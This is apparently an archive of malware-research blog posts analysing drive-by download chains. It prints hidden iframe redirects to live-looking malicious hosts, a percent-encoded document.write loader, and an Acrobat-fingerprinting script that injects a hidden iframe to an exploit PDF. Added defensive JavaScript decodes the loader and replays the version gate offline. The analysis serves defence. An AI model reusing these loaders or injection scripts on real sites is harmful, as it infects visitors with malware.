Archive for the 'IFRAME' Category

13 Oct

Internet Exploitation Adventure

This post shows the lengths people will go to in order to install malware onto computers. We will show how visiting one website takes you on a journey through many websites that check your computer for vulnerable software and, if any is found, install malware on your computer.

First, there is a list of the domains involved in the exploit adventure. Simply visiting hxxp://defendmycreditunion.org starts the process. Hidden iframes then load websites that scan your computer for vulnerabilities, and if a page cannot exploit it, it redirects you somewhere else. These websites are still active, so proceed at your own risk.

The links on this page DO NOT link to the infected websites. They are anchor links to the analysis further down the page, to make it easier to view. The links just below are listed in the approximate order in which they would load while exploiting the machine.

BE ADVISED: The actual domains may still be active. Proceed at your own risk!

The picture below shows a visual map of how the pages are loaded.


04 Oct

Another Adobe Acrobat Exploit (accwizm.exe)-VIDEO

Once again, we have an Adobe exploit page injecting another piece of malware. This one is different from the one posted earlier, and it redirects through multiple pages, logging each visitor. I was able to capture a video of the computer being exploited simply by visiting the page. As with the previous exploit, the binary installed is almost fully undetected except for a few heuristic catches. Look below for more information about this exploit and about the binary. It can be downloaded from /pnuemo-malware/ in our repository.

BE ADVISED: All sites may be active. Proceed at your own risk.

The user will visit the following URL: hxxp://66.232.117.33/~catetc/tdsHAX/kotopoucykanety.php

This page contains a simple hidden iframe that loads multiple pages, each logging the visitor.

<iframe src="http://megsrdomain.cn/tor/count.php?o=5" width=1 height=1 style="visibility: hidden"></iframe>

Inside the iframe we are redirected twice before reaching the exploit page.

hxxp://megsrdomain.cn/tor/count.php?o=5 -> hxxp://megsrdomain.cn/tor/count.php?o=2 -> hxxp://82.103.138.10/ls/?t=24

hxxp://82.103.138.10/ls/?t=24 is the page that exploits Adobe Acrobat and installs the malware. It contains many, many pages of code, too much to post here. You can view or download a clean .txt of the page code for this exploit by clicking here.

accwizm.exe
Result: 8/36 (22.22%)
MD5: 2bee943c7b8e63d17a92b99087ba15a7
VirusTotal
Sunbelt Sandbox

Download Video

31 Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

The user visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included:

<script language="javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>

When deobfuscated…

<iframe src="http://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
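The loader above, decoded statically as an added example (not code from the original post): it pulls the unescape() payload out of the raw script text, percent-decodes it without executing anything, and reports the iframe it would inject, flagging 1x1 or visibility:hidden frames. The two sample strings are copies of this page's snippets (this loader and the count.php iframe from the accwizm.exe post); the helper names are my own.

```javascript
// Sample inputs, copied from this page: the encoded document.write() loader
// above and the plain count.php iframe from the accwizm.exe post.
const SAMPLE_SCRIPT = '<script language="javascript">document.write(unescape(\'' +
  "%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E" +
  "%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69" +
  "%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68" +
  "%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69" +
  "%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74" +
  "%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66" +
  "%72%61%6D%65%3E'));</script>";
const SAMPLE_PLAIN = '<iframe src="http://megsrdomain.cn/tor/count.php?o=5" width=1 height=1 style="visibility: hidden"></iframe>';
// Emulate unescape() without executing anything: %XX is one Latin-1 code unit, %uXXXX one UTF-16 code unit.
function unescapeStatic(s) {
  return s.replace(/%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})/g,
    (m, u, b) => String.fromCharCode(parseInt(u || b, 16)));
}

// Pull every unescape('...') argument out of the raw page text.
function extractUnescapePayloads(html) {
  const out = [];
  const re = /unescape\(\s*(['"])([\s\S]*?)\1\s*\)/g;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[2]);
  return out;
}

// Find <iframe> tags and flag the hidden ones (1x1 or styled invisible), the pattern every loader on this page uses.
function findIframes(markup) {
  const found = [];
  const tagRe = /<iframe\b([^>]*)>/gi;
  let m;
  while ((m = tagRe.exec(markup)) !== null) {
    const attrRe = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[1])) !== null) attrs[a[1].toLowerCase()] = a[2] ?? a[3] ?? a[4];
    const style = (attrs.style || "").toLowerCase();
    const hidden = (attrs.width === "1" && attrs.height === "1") ||
      /visibility\s*:\s*hidden|display\s*:\s*none/.test(style);
    found.push({ src: attrs.src, width: attrs.width, height: attrs.height, hidden });
  }
  return found;
}
// Scan the raw markup plus every decoded payload it carries.
function analyze(html) {
  const decoded = extractUnescapePayloads(html).map(unescapeStatic);
  return [html, ...decoded].flatMap(findIframes);
}
console.log(JSON.stringify([analyze(SAMPLE_SCRIPT), analyze(SAMPLE_PLAIN)], null, 2));
```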

We can see the hidden iframe above and the page includes the following code…

<script>
// Fingerprint the Acrobat and Flash plugins from navigator.plugins descriptions.
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
// Loose match on "Adobe Acrobat Plug-In ... <major>.<minor>"; captures the version.
re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
// Loose match on "Shockwave Flash <major>.<minor> r<build>"; recorded but never used here.
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+'.'+res[2]+'.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
// Strip non-digits ("7.0" -> "70") and gate on the first two digits only:
// fire for 7.0x or any major version below 7.
ppdf=ppdf.replace(/\D/g,"");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;
if(ppdfenable)
{
// Vulnerable version detected: load the malicious PDF in a hidden 1x1 iframe.
document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');
}
}
</script>
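The fingerprint and version gate above, rewritten as an added example (not the original page's code) as pure functions over plugin description strings, so the decision can be checked offline: the two regexes are copied from the script, the sample descriptions are constructed in navigator.plugins[i].description format, and the function names are my own.

```javascript
// Added example: the page's plugin fingerprint and version gate as pure functions
// over plugin description strings. Regexes are the page's own; the sample
// descriptions are constructed in navigator.plugins[i].description format.
const ACROBAT_RE = /.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
const FLASH_RE = /.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;

// Mirrors the page's loop: the last matching description wins, "0" means none matched.
function acrobatVersion(descriptions) {
  let ppdf = "0";
  for (const d of descriptions) {
    const r = ACROBAT_RE.exec(d);
    if (r) ppdf = r[1];
  }
  return ppdf;
}

// Flash is fingerprinted the same way; the page records it but never uses it.
function flashVersion(descriptions) {
  let flash = null;
  for (const d of descriptions) {
    const r = FLASH_RE.exec(d);
    if (r) flash = r[1] + "." + r[2] + "." + r[3];
  }
  return flash;
}

// The gate: strip non-digits ("7.0" -> "70") and look only at the first two
// digits, firing for a major version below 7 or for 7.0x. Note how brittle it is:
// a description ACROBAT_RE does not match counts as "no Acrobat" and nothing fires.
function exploitWouldFire(descriptions) {
  const v = acrobatVersion(descriptions);
  if (v === "0") return false;
  const digits = v.replace(/\D/g, "");
  const major = Number(digits[0]);
  const minor = Number(digits[1]);
  return (major === 7 && minor < 1) || major < 7;
}

// Constructed plugin lists for three hypothetical visitors.
const VISITORS = {
  reader70: ["Shockwave Flash 9.0 r47", "Adobe Acrobat Plug-In Version 7.0 for Netscape"],
  reader81: ["Shockwave Flash 9.0 r47", "Adobe Acrobat Plug-In Version 8.1 for Netscape"],
  noAcrobat: ["Shockwave Flash 9.0 r47", "Adobe PDF Plug-In For Firefox and Netscape"],
};

for (const [name, plugins] of Object.entries(VISITORS)) {
  console.log(name, acrobatVersion(plugins), flashVersion(plugins), exploitWouldFire(plugins));
}
```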

This leads us to the PDF in question, located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. It is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

29 Aug

XP Antivirus 2008 IFRAME update

While stepping through malicious domains I noticed that the "International Virus Research Lab" (IVRL) pages for XP Antivirus 2008 had changed hashes. I was looking at hxxp://bestantivirus2009.com at the time and noticed the inclusion of an IFRAME pointing to hxxp://huytegygle.com/index.php.

[screenshot: iframe]

I took a look at the IFRAME and found the following obfuscated JavaScript.

[screenshot: obfuscated JavaScript code]

After attempting a few exploits, the code eventually leads us to hxxp://huytegygle.com/bin/file.exe, which has a low (7/36, mostly heuristic) detection rate at VirusTotal. The file has been made available inside /lithium-malware/.

File: file.exe [ThreatExpert]
File size: 8192 bytes
MD5: a2a6455a4da0192fb8efe85e98fd3dfa
SHA1: a9a65198cf692a306be1e23c9e965549b7294b26
SHA256: 92255343407bf219f094bec01ac7750cf82869741d6fb5c27967624ce0e6bc80
SHA512: 2b9a1c7b33e80bdfc213be9d3dfbeb7491ede790045c5aec15ec55bd686c9787d2b19420f8058286c286375db2bee84e55d101c42f99a03a92010691e0b8eeb9
PEiD: -
